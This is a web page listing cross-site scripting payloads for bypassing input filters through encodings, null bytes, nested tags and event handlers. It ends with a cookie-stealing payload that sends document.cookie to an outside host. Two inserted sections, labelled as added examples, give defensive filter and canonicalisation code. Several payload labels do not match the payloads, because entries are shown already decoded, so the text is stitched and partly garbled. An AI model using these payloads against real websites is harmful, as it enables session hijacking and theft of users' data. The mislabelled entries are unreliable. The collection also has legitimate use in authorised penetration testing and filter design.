Payload Collection
Payloads for exploiting the XSS (Cross-Site Scripting) vulnerability
Basic
<script>alert(1234)</script>
<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<script>var m=<html><a href="//host">link</a>
Payloads without the <script> tag
<img+src="http://localhost">
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
<IMG+LOWSRC="javascript:alert(1);">
<isindex+type=image+src=1+onerror=alert(1)>
<meta style="xss:expression(open(alert(1)))" />
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">
<!</textarea <body onload='alert(1)'>
<img+<iframe ="1" onerror="alert(1)">
<iframe src="http://localhost"></iframe>
<base+href="javascript:alert(1);//">
<bgsound+src="javascript:alert(1);">
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
<object+data="javascript:alert(0)">
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
<Layer+src="http://localhost">
%3E%3Cbody%20onload=javascript:alert(1)%3E
'">><marquee><h1>1</h1></marquee>
</br style=a:expression(alert(1))>
<font style='color:expression(alert(1))'>
<embed src="data:image/svg+xml;>
<frameset><frame src="xss"></frameset>
<link href="http://host/xss.css">
="/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex action=javascript:alert(1) type=image>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
</a onmousemove="alert(1)">
'%26%26'javascript:alert%25281%2529//
Without Brackets
"+onmouseover="window.location='http://localhost'
"+onkeypress="prompt(23)"+
"+onfocus="prompt(1)"+
500);alert(1);//
alert(document['cookie'])
with(document)alert(cookie)
";location=location.hash)//#0={};alert(0)
//";alert(String.fromCharCode(88,83,83))
%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
"+onDblClick=prompt(123)"+
"+onError=prompt(123)"+
"+onReset=prompt(123)"+
XSS payloads in JavaScript
javascript:prompt(1)
javascript:eval(unescape(location.href))
a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);
location=location.hash.slice(1);
";location=location.hash)//#0={};alert(0)
location=location.hash
""+{toString:alert}
""+{valueOf:alert}
";eval(unescape(location))//# %0Aalert(0)
;location.href='http://site';//
XSS - With NewLine
%";eval(unescape(location))//#%0Aprompt(0)
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>
%'});%0aalert(1);%20//
XSS - With NewLine and Comment
<script>//>%0Aalert(1);</script>
XSS - Null Byte Injected
<script%00>alert(1)</script%00>
<scr%00ipt>prompt(1)</sc%00ript>
<scr\0ipt>prompt(1)</sc\0ript>
%00"><script>alert(1)</script>
XSS - Null Byte in Script Tags
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
XSS - With Encoded NewLine
<IMG+SRC="jav&#x0A;ascript:alert(1);">
XSS - With Carriage Return
<IMG+SRC="jav%0dascript:alert(1);">
XSS - With Encoded Carriage Return
<IMG+SRC="jav&#x0D;ascript:alert(1);">
XSS - With Tab
<IMG+SRC="jav%09ascript:alert(1);">
XSS - With Encoded Tab
<IMG+SRC="jav&#x09;ascript:alert(1);">
Concatenation
document.write("<scr"+"ipt language=javascript src=http://localhost/></scr"+"ipt>");
Developer blacklist bypass
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
XSS - Basic XSS as parameter name
12&<script>alert(123)</script>=123
XSS - With eval
<img src=x:alert(alt) onerror=eval(src) alt=0>
XSS - jQuery
<img src=/ onerror=alert(1)>
XSS - With eval
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
XSS - No white space for IE
<img/src="xss.png"alt="xss">
XSS - Mocha
<IMG SRC="mocha:[code]">
XSS - XHTML
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
XSS - Remote style sheet
<STYLE>@import'http://host/css';</STYLE>
XSS - Special XSS
<SCRIPT+a=">'>"SRC="http://localhost"></SCRIPT>
XSS - Bypass for Custom Filters
<scr<script>ipt>alert('XSS')</scr</script>ipt>
XSS - URL Encoded
%3Cscript%3Ealert(1)%3C/script%3E
XSS - Null Byte Injected
foo%00<script>alert(document.cookie)</script>
XSS - Developer filter bypass
"><<script>alert(document.cookie);//<</script>
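The nested-tag payloads in the developer-blacklist, custom-filter and developer-filter-bypass entries above all exploit the same mistake: a filter that deletes `<script>` (or `<iframe`) in a single pass, so the halves on either side of the deleted tag join up into a live tag. The following is an added example, not code from the original page; `naiveBlacklist` and `stripUntilStable` are hypothetical stand-ins for what a developer might write, and it runs under Node.js:

```javascript
// Added example (not from the original page). Shows why a blacklist that deletes
// "<script>" in one pass is bypassed by the nested payloads, and what the fix is.
// naiveBlacklist/stripUntilStable are hypothetical stand-ins for a developer's filter.

// The kind of "developer blacklist" the payloads target: remove every <script>,
// </script> and "<iframe" substring in a single pass.
function naiveBlacklist(input) {
  return input.replace(/<\/?script>|<iframe/gi, "");
}

// Re-apply the blacklist until nothing changes. This survives the nesting trick,
// but it is still a blacklist: any tag or handler it does not know about passes.
function stripUntilStable(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = naiveBlacklist(cur);
  } while (cur !== prev);
  return cur;
}

// The correct control for untrusted text placed in an HTML body: encode the
// characters that have meaning to the HTML parser so nothing can become markup.
function htmlEncode(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Payloads taken from the page.
const NESTED = "<scr<script>ipt>alert('XSS')</scr</script>ipt>";
const NESTED_CLOSE_FIRST = "</scr</script>ipt><ifr<iframeame/onload=prompt()>whs";
const EVENT_HANDLER = "<img src=/ onerror=alert(1)>";

function demo() {
  return {
    // One pass removes the inner tags and the halves join into a live <script>.
    naive: naiveBlacklist(NESTED),                   // "<script>alert('XSS')</script>"
    naiveIframe: naiveBlacklist(NESTED_CLOSE_FIRST), // "</script><iframe/onload=prompt()>whs"
    // Iterating removes the reassembled tag too, leaving inert text.
    stable: stripUntilStable(NESTED),                // "alert('XSS')"
    // ...but an event-handler payload the blacklist never mentions is untouched.
    stableMiss: stripUntilStable(EVENT_HANDLER),     // unchanged, still executes
    // Encoding keeps every payload as visible text regardless of its shape.
    encoded: htmlEncode(NESTED),
  };
}

console.log(demo());
```

`stripUntilStable` is included only to show that iterating a blacklist closes the nesting hole without closing the class of bug: `<img src=/ onerror=alert(1)>` from the jQuery entry goes through it untouched. Output encoding for the context the data lands in (HTML body here) is the control that does not depend on guessing the attacker's tag list.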
XSS - Concatenation
><s"%2b"cript>alert(document.cookie)</s"%2B"cript>
XSS - Extra URL Encoded
3Cscript%3Ealert(1)%3C%2Fscript%3E
XSS - Double URL Encoded
%253Cscript%253Ealert(1)%253C/script%253E
XSS - Full URL Encoded
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
XSS - ASCII Encoded
%BCscript%BEalert(%A21%A2)%BC/script%BE
XSS - Overlong UTF-8
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
XSS - Base64 Encoded
<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
XSS - Base64 Encoded
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>
XSS - Full Base64 Encoded
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
XSS - HTML Encoded
<a+href="javascript#alert(1);">
XSS - UTF-8 Encoded
<IMG+SRC=jAvascript:alert(1)>
XSS - UTF-8 Encoded
<IMG+SRC=javascript:alert('X')>
XSS - With uncommon event handler
<INPUT+TYPE="checkbox"+onDblClick=confirm('XSS')>
XSS - With uncommon event handler
<APPLET+CODE=""+CODEBASE="http://url/xss">
XSS - Long UTF-8 Encoded
<IMG+SRC=javascript:alert('X')>
XSS - %U Encoded
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
XSS - UTF-7 Encoded
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
XSS - Without quotes
<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>
XSS - HTML Entity Encoding (rendered here with its entities already decoded)
<script>prompt('1')</script>
XSS - Hex Entity Encoding (rendered here with its entities already decoded)
<script>alert('xss')</script>
XSS - Decimal Entity Encoding
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
XSS - Octal Entity Encoding
&#074;&#0163;&#0143;&#0162;&#0151;&#0160;&#0164;&#076;&#0141;&#0154;&#0145;&#0162;&#0164;&#050;&#047;&#0170;&#0163;&#0163;&#047;&#051;&#074;&#057;&#0163;&#0143;&#0162;&#0151;&#0160;&#0164;&#076;
(HTML numeric character references are decimal or hex only; a browser decodes &#074; as decimal 74, "J", so this form only works against a decoder that reads the digits as octal.)
XSS - URL Encoded HTML Entity
=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
XSS - With Expression for IE
"+style%3d"x%3aexpression(alert(1))+
XSS - Escaping escapes
\";alert(1);//
XSS - Eating Chars
<img src="x:%90" title="onerror=alert(1)//">
XSS - FormFeed Injected for IE
%3Cscript%0Caaaaa%3Ealert%2812%29%3C/script%0Caaaaa%3E
XSS - FormFeed Injected for Firefox
<script%0Caaaaa>alert(123)</script>
XSS - Vertical-tab Injected for IE
%3Cscript%0Baaa%3Ealert%28%29%3C/script%0Baaaa%3E
XSS - Vertical-tab Injected for Firefox
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
XSS - With star
<*script>prompt(123)<*/script>
XSS - Carriage Return Injected
<script%0Daaa>alert(1)</script%0Daaaa>
XSS - Space Insertion
<script%20TEST>alert(1)</script%20TESTTEST>
XSS - Non Alpha/Non Digit
<SCRIPT/XSS SRC="http://host"></SCRIPT>
XSS - No Closing Script Tag
<SCRIPT+SRC=http://host/
XSS - With Extra Brackets
<<SCRIPT>alert(1);//<</SCRIPT>
XSS - Half-Width/Full-Width Characters
<script>prompt(1)</script>
Half-Width/Full-Width Unicode - 1
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
Half-Width/Full-Width Unicode - 2
%uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e
Full-width %u encoding
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
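Most of the encoded variants above (URL, double URL, %uXXXX, overlong UTF-8, decimal and hex entities, NUL bytes, full-width Unicode) get past a filter only because the filter matches before the input has been decoded to the form the browser will actually parse. The following is an added example, not code from the original page, of canonicalising input until it stops changing and only then looking for `<script`; the function names are this example's own, the overlong handling imitates an old lenient decoder rather than a current browser, and it runs under Node.js:

```javascript
// Added example (not from the original page): decode input the way a lenient
// browser/parser would, repeatedly, before matching. Function names are this
// example's own. Runs under Node.js.

// One layer of URL decoding, including the non-standard %uXXXX form.
function urlDecodeOnce(s) {
  return s
    .replace(/%u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Two-byte overlong UTF-8 (lead byte C0/C1) as an old lenient decoder read it:
// C0 BC -> "<", C0 BE -> ">". Strict decoders reject these sequences.
function decodeOverlongUtf8(s) {
  return s.replace(/[\u00C0\u00C1]([\u0080-\u00BF])/g, (lead2, cont) =>
    String.fromCharCode(((lead2.charCodeAt(0) & 0x1f) << 6) | (cont.charCodeAt(0) & 0x3f)));
}

// Numeric character references (decimal and hex) and the few named ones that matter.
function decodeHtmlEntities(s) {
  const named = { lt: "<", gt: ">", quot: '"', amp: "&", apos: "'" };
  const cp = (n) => (n > 0x10ffff ? "\uFFFD" : String.fromCodePoint(n));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&(lt|gt|quot|amp|apos);/gi, (_, n) => named[n.toLowerCase()]);
}

// Decode until the string stops changing (bounded, so nested encodings cannot
// make this loop forever), drop NUL bytes, and fold full-width forms to ASCII.
function canonicalize(input) {
  let cur = input;
  for (let round = 0; round < 8; round++) {
    const next = decodeHtmlEntities(decodeOverlongUtf8(urlDecodeOnce(cur)))
      .replace(/\0/g, "")
      .normalize("NFKC");
    if (next === cur) return next;
    cur = next;
  }
  return cur;
}

// The check itself only makes sense on the canonical form.
function containsScriptTag(input) {
  return /<\s*script\b/i.test(canonicalize(input));
}

// Encoded payloads from the page, each of which hides "<script" from a naive match.
const SAMPLES = [
  "%253Cscript%253Ealert(1)%253C/script%253E",
  "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e",
  "%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE",
  "%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e",
  "<scr%00ipt>prompt(1)</sc%00ript>",
  "&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(1)",
];

function report() {
  return SAMPLES.map((p) => ({ raw: p, canonical: canonicalize(p), flagged: containsScriptTag(p) }));
}

console.log(report());
```

Two things worth noticing when running it: the "octal entity" form from the page canonicalises to `J` (decimal 74), which is what a browser does with it; and the bounded loop matters, because a filter that decodes exactly once is what the double-URL-encoded entry is designed to beat.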
As a parameter name
1&"><script>alert(1)</script>=1
Custom Filter
</scr</script>ipt><ifr<iframeame/onload=prompt()>whs
Realistic Exploit
%3E%3Cbody%20onload=javascript:alert(1)# var sc=escape(document.cookie);var d=escape(document.location);var mI=new Image();mI.src="http://host?a="+d+"&b="+ sc;